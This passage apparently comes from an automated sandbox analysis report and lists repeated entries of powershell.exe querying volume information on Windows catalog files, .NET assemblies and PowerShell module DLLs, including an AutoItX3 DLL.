Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
